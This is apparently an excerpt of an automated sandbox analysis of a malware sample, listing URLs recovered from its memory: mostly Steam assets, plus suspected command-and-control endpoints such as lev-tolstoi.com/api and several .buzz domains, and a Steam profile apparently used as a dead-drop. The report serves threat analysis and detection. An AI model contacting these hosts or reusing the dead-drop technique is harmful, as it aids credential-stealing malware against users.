                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003056000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.co.jp
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/KP
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245493207.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221332902.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1Wu
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rebuildeso.buzz/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rebuildeso.buzz/ZTL
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167343314.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/IP
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167452734.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/api
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/api3
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200122003.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900JW
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
